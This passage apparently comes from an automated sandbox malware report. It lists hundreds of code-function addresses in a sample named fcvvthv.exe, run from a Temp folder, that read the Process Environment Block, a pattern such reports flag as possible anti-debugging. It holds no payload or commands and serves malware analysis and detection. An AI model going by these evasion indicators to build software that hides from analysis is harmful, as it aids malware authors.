          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B24015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B12073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B21074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A70050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B149A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A799BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AE41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A74120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A94A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A68A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A55210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A55210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A73A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A9927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A59240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AE4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B25BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A61B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A803E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A83B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00ADA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B03D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A77D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B20EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A676E2 mov eax, dword ptr fs:[00000030h]
